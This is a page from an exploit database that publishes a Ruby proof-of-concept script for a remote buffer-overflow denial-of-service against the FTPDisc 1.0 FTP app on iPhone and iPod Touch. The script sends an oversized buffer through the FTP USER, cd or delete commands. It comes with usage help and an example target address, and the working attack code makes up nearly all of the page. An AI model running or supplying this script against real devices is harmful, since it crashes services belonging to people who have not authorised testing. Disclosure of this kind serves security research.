iPhone / iTouch FTPDisc 1.0 3ExploitsInOne BuffOverflow DoS

Exploit Code :

###############
# Title -> iPhone / iTouch FTPDisc 1.0 3ExploitsInOne BuffOverflow DoS
# Model -> Tested on iPod Touch 3G 3.1.3
# Software -> FTPDisc 1.0 and FTPDisc 1.0 Lite
http://itunes.apple.com/es/app/ftpdisc-lite-pdf-reader/id329157971?mt=8
# Attacker -> Tested from GNU/Linux (Sidux), fuzzing with a future PenTBox
version :P
#
# Exploit languaje -> Ruby
# Type -> Remote Denial of Service Exploit caused by Buffer Overflow
#
#
###############
# Discovered and written by Alberto Ortega
# http://pentbox.net/
###############

require "socket"
require "net/ftp"

expl = ARGV[0]
host = ARGV[1]

puts ""
if !expl || !host
puts "HELP - iPhone / iTouch FTPDisc 1.0 3ExploitsInOne BuffOverflow
DoS"
puts ""
puts "Exploits: 1 - USER [MALFORMED] 2 - cd [MALF] 3 - delete [MALF]"
puts ""
puts "- Usage: ftpdisc3io.rb [numberofexploit] [host]"
puts "- Example: ftpdisc3io.rb 1 192.168.1.2"
puts ""
else
buffer = "A"
10.times do
buffer = "#{buffer}#{buffer}" # Here de big buffer to send
end
if expl == "1" # EXPLOIT 1
begin
socket = TCPSocket.new(host, 21)
puts "[*] Exploiting ..."
socket.write("USER #{buffer}\r\n")
puts "[*] Succesfully exploited! :)"
rescue
puts "Connection problem"
end
elsif expl == "2" || expl == "3"
begin
print "[*] Connecting to FTP ... "
ftp = Net::FTP.new(host, "anonymous")
puts "OK"
puts "[*] Exploiting ..."
if expl == "2"
begin
ftp.chdir(buffer) # EXPLOIT 2
rescue
end
else
begin
ftp.delete(buffer) # EXPLOIT 3
rescue
end
end
puts "[*] Succesfully exploited! :)"
rescue
puts "Connection problem"
end
else
puts "Incorrect exploit selection (1, 2, 3)"
end
end
puts ""

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason